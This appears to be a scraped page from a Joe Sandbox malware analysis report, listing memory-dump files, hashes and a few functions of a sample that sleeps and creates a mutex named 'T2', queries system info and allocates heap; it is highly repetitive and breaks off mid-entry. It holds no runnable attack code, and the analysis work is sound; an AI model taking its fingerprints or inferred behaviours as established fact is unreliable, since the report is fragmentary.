Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2
API String ID: 1464230837-631260391
Opcode ID: 5f8f702f8f5a0771d3e858ef506ae3e89a6ace3017a4afde4d4d855d0becc94d
Instruction ID: b7fb1cea682ec107b016d3853bb9d23f2dd0cf9d0ce1716bd29f4ed7c7afb8a8
Opcode Fuzzy Hash: 5f8f702f8f5a0771d3e858ef506ae3e89a6ace3017a4afde4d4d855d0becc94d
Instruction Fuzzy Hash: DF2149317042049BFB189F68EC8976DF7A6EBC1324F245229E414F73E6DBB599C18611

Function 00E0A856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00E0A963
CreateMutexA.KERNEL32(00000000,00000000,00E63254), ref: 00E0A981

Strings

T2, xrefs: 00E0A970

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2
API String ID: 1464230837-631260391
Opcode ID: 638e05196fcb2f584a6196c1248d44211f5aa67afc5cb64da0b798aca2374408
Instruction ID: 2b588f6f49c4395eea23c36b26b626188eb200fb507fe7376550af3ca3d9121c
Opcode Fuzzy Hash: 638e05196fcb2f584a6196c1248d44211f5aa67afc5cb64da0b798aca2374408
Instruction Fuzzy Hash: F5212B317483089AFB28AB68DC9A76DF791DF82304F2C7826E544B62D5CEB559C181A3

Function 00E0A34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00E0A963
CreateMutexA.KERNEL32(00000000,00000000,00E63254), ref: 00E0A981

Strings

T2, xrefs: 00E0A970

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2
API String ID: 1464230837-631260391
Opcode ID: 7056cfdaae82ae0f51e9bc7be08aff5cdb4936426100c291ba692ddf9dbaee10
Instruction ID: 9b14d7cbda6e031d4fc0f9d3c3d98a7ccea09d0961180ecf707a5b9d530164f9
Opcode Fuzzy Hash: 7056cfdaae82ae0f51e9bc7be08aff5cdb4936426100c291ba692ddf9dbaee10
Instruction Fuzzy Hash: 072179327043089BFB189B68EC8576CF7A2EBD1314F286229E414F77D4CBB559C08352

Function 00E07D30 Relevance: 1.9, APIs: 1, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E07ED3

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 91bf7bf8bb10d2db050806f45fc998f8d087abf44ca8eeffb2c274be3da91ffd
Instruction ID: 9c32124a490d97ff3cef72880af5decfc5073de0bd9c4744da23a616c1b24b40
Opcode Fuzzy Hash: 91bf7bf8bb10d2db050806f45fc998f8d087abf44ca8eeffb2c274be3da91ffd
Instruction Fuzzy Hash: B3E13571E006049BDB14BB28DD4B39E7BB1AB86724F94229CE4557B3C2DB744EC58BC2

Function 00E1D3E2 Relevance: 1.7, APIs: 1, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00E024BE

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: d617aff2d2bf02008adbc06c870f326c2ccf2f1079922190fc080b6af1334932
Instruction ID: 29476a1b04c61fb1748e2307f2d96a1c6f8a1550d4e1ceb9004765ecc91bf20d
Opcode Fuzzy Hash: d617aff2d2bf02008adbc06c870f326c2ccf2f1079922190fc080b6af1334932
Instruction Fuzzy Hash: 4671E2B2E0470A9FDB15CF99EC856DAB7F4FB48354F10952AE505FB250D370A984CB90

Function 00E3D82F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00E3A813,00000001,00000364,00000006,000000FF,?,00E3EE3F,?,00000004,00000000,?,?), ref: 00E3D871

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 28ba17de6bf3699e4cf3dacd00c2e800c0e7f6ed0e77c7fe7b643a7bea8ce0c5
Instruction ID: c9ea60090a36148d0020c18175015ef4779ed67ec0b842f5ca15a9baf8665a86
Opcode Fuzzy Hash: 28ba17de6bf3699e4cf3dacd00c2e800c0e7f6ed0e77c7fe7b643a7bea8ce0c5
Instruction Fuzzy Hash: 4FF0E93160922466DB292A73BD0EA5B3F99DF45770F15A521FD04F7181DA60FC00C5E0

Function 00E3B04B Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

